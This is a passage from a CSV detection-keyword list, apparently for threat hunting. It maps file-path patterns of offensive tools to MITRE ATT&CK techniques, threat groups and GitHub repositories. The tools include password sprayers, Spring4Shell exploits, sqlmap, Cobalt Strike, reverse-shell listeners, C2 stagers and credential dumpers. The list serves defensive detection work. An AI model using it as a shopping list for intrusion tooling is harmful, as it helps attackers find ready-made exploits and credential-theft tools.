T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Spray-AD","1","1","N/A","10","10","408","58","2022-04-01T07:03:39Z","2020-01-09T10:10:48Z" +"*/sprayers/owa.py*","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","1","N/A","10","10","1352","268","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z" +"*/sprayhound.git*","offensive_tool_keyword","sprayhound","Password spraying tool and Bloodhound integration","T1110.003 - T1210.001 - T1069.002","TA0006 - TA0007 - TA0003","N/A","N/A","Credential Access","https://github.com/Hackndo/sprayhound","1","1","N/A","N/A","2","136","12","2023-02-15T11:26:53Z","2020-02-06T17:45:37Z" +"*/sprayhound/*.py*","offensive_tool_keyword","sprayhound","Password spraying tool and Bloodhound integration","T1110.003 - T1210.001 - T1069.002","TA0006 - TA0007 - TA0003","N/A","N/A","Credential Access","https://github.com/Hackndo/sprayhound","1","1","N/A","N/A","2","136","12","2023-02-15T11:26:53Z","2020-02-06T17:45:37Z" +"*/spraying.py*","offensive_tool_keyword","Vajra","Vajra is a UI based tool with multiple techniques for attacking and enumerating in target's Azure environment","T1087 - T1098 - T1583 - T1078 - T1110 - T1566 - T1537 - T1020 - T1526 - T1482","TA0003 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/TROUBLE-1/Vajra","1","1","N/A","N/A","4","336","57","2023-03-16T09:45:53Z","2022-03-01T14:31:27Z" +"*/SprayingToolkit*","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","1","N/A","10","10","1352","268","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z" +"*/SprayingToolkit.git*","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","0","N/A","10","10","1352","268","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z" +"*/Spring4Shell-POC*","offensive_tool_keyword","Spring4Shell","Spring4Shell Proof Of Concept/Information CVE-2022-22965","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tools","https://github.com/BobTheShoplifter/Spring4Shell-POC","1","1","N/A","N/A","4","335","106","2022-11-09T15:46:06Z","2022-03-30T07:54:45Z" +"*/Spring4Shell-POC*","offensive_tool_keyword","Spring4Shell","Dockerized Spring4Shell (CVE-2022-22965) PoC application and exploit","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tools","https://github.com/reznok/Spring4Shell-POC","1","1","N/A","N/A","4","303","229","2022-08-04T18:26:18Z","2022-03-31T00:24:28Z" +"*/SpringCore0day*","offensive_tool_keyword","SpringCore0day","SpringCore0day from share.vx-underground.org & some additional links","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tools","https://github.com/craig/SpringCore0day","1","1","N/A","N/A","4","394","187","2022-03-31T11:54:22Z","2022-03-30T15:50:28Z" +"*/spring-core-rce*","offensive_tool_keyword","spring-core-rce","CVE-2022-22965 : about spring core rce","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tools","https://github.com/Mr-xn/spring-core-rce","1","1","N/A","N/A","1","54","18","2022-04-01T15:34:03Z","2022-03-30T14:35:00Z" +"*/Spring-CVE/*","offensive_tool_keyword","POC","POC exploit for CVE-2022-22963","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tools","https://github.com/kh4sh3i/Spring-CVE","1","1","N/A","N/A","1","13","7","2022-03-31T20:58:54Z","2022-03-31T20:19:51Z" +"*/SpringFramework_CVE-2022-22965_RCE*","offensive_tool_keyword","POC","SpringFramework CVE-2022-22965","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tools","https://github.com/Axx8/SpringFramework_CVE-2022-22965_RCE","1","0","N/A","N/A","1","76","17","2022-04-01T12:08:45Z","2022-04-01T04:51:44Z" +"*/springshell-rce-poc*","offensive_tool_keyword","Spring4Shell","CVE-2022-22965 - CVE-2010-1622 redux","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tools","https://github.com/DDuarte/springshell-rce-poc","1","1","N/A","N/A","1","21","12","2023-04-18T14:15:42Z","2022-03-31T08:06:46Z" +"*/sql_inj.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*/sqli.txt*","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/CoolerVoid/0d1n","1","1","N/A","N/A",,"N/A",,, +"*/sqli/mssqli*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/sqli/mysqli*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/sqli/postgresqli*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/sqli/sqlitei*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/sqli/utils*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/sqli_test.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/Sqlmap*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1059 - T1553 - T1574 - T1210 - T1220","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"*/sqlmap.zip*","offensive_tool_keyword","sqlipy","SQLiPy is a Python plugin for Burp Suite that integrates SQLMap using the SQLMap API.","T1190 - T1210 - T1574","TA0002 - TA0040 - TA0043","N/A","N/A","Network Exploitation tools","https://github.com/codewatchorg/sqlipy","1","1","N/A","N/A","3","247","102","2023-05-08T18:50:41Z","2014-09-22T03:25:42Z" +"*/SQLRecon*","offensive_tool_keyword","SQLRecon","A C# MS SQL toolkit designed for offensive reconnaissance and post-exploitation","T1003.003 - T1049 - T1059.005 - T1078.003","TA0005 - TA0006 - TA0002 - TA0004","N/A","N/A","Network Exploitation Tools","https://github.com/skahwah/SQLRecon","1","1","N/A","N/A","6","502","97","2023-08-10T00:42:31Z","2021-11-19T15:58:49Z" +"*/sqrtZeroKnowledge/CVE-*","offensive_tool_keyword","poc","Exploit for the CVE-2023-23398","T1068 - T1557.001 - T1187 - T1212 -T1003.001 - T1550","TA0003 - TA0002 - TA0004","N/A","N/A","Exploitation tools","https://github.com/sqrtZeroKnowledge/CVE-2023-23397_EXPLOIT_0DAY","1","1","N/A","N/A","2","158","46","2023-03-15T17:53:53Z","2023-03-15T17:03:38Z" +"*/src/exploit.html.tpl*","offensive_tool_keyword","POC","Just another PoC for the new MSDT-Exploit","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/komomon/CVE-2022-30190-follina-Office-MSDT-Fixed","1","1","N/A","N/A","4","387","57","2023-04-13T16:46:26Z","2022-06-02T12:33:18Z" +"*/src/john.com*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*/src/jumbo.c*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*/src/jumbo.h*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*/src/nysm.c*","offensive_tool_keyword","nysm","nysm is a stealth post-exploitation container","T1610 - T1037 - T1070","TA0005 - TA0002 - TA0003","N/A","N/A","POST Exploitation tools","https://github.com/eeriedusk/nysm","1","0","N/A","10","1","32","3","2023-09-30T21:17:33Z","2023-09-25T10:03:52Z" +"*/src/RecycledGate.h*","offensive_tool_keyword","RecycledInjector","Native Syscalls Shellcode Injector","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/florylsk/RecycledInjector","1","1","N/A","N/A","3","214","35","2023-07-02T11:04:28Z","2023-06-23T16:14:56Z" +"*/src/Sleeper.cpp*","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files (BOF) for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/crypt0p3g/bof-collection","1","1","N/A","10","10","151","25","2022-12-05T04:49:33Z","2021-01-20T06:07:38Z" +"*/src/unixshell.rs*","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","1","N/A","10","10","574","56","2023-10-02T11:32:12Z","2021-06-04T17:03:47Z" +"*/srdi-shellcode.go*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*/ssh2-enum-algos.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/ssh-auth-methods.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/ssh-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/ssh-hostkey.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/ssh-publickey-acceptance.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/ssh-run.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/sshv1.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/ssl-ccs-injection.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/ssl-cert.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/ssl-cert-intaddr.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/ssl-date.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/ssl-dh-params.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/ssl-enum-ciphers.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/ssl-heartbleed.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/ssl-known-key.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/ssl-poodle.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/sslv2.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/sslv2-drown.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/ssp/decryptor.py","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"*/SspiUacBypass.git*","offensive_tool_keyword","SspiUacBypass","Bypassing UAC with SSPI Datagram Contexts","T1548.002","TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/SspiUacBypass","1","1","N/A","10","2","183","27","2023-09-24T17:33:25Z","2023-09-14T20:59:22Z" +"*/ssploit/*","offensive_tool_keyword","spoolsploit","A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.","T1204 - T1547 - T1562 - T1003 - T1018 - T1570 - T1005","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/BeetleChunks/SpoolSploit","1","1","N/A","N/A","6","533","90","2021-07-16T04:49:43Z","2021-07-07T00:32:28Z" +"*/SSRFmap*","offensive_tool_keyword","SSRFmap","Automatic SSRF fuzzer and exploitation tool","T1210 - T1211 - T1212 - T1574","TA0002 - TA0007 - TA0008","N/A","N/A","Exploitation tools","https://github.com/swisskyrepo/SSRFmap","1","1","N/A","N/A","10","2464","458","2023-05-27T19:30:08Z","2018-10-15T19:08:26Z" +"*/sstp-discover.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/StackCrypt.git*","offensive_tool_keyword","StackCrypt","Create a new thread that will suspend every thread and encrypt its stack then going to sleep then decrypt the stacks and resume threads","T1027 - T1055.004 - T1486","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/StackCrypt","1","1","N/A","9","2","144","23","2023-08-02T02:25:12Z","2023-04-26T03:24:56Z" +"*/stage_wmi*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*/stager.ps1*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" +"*/stager/powershell.py*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*/stager/powershell/payload.ps1*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*/stagers/*.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - 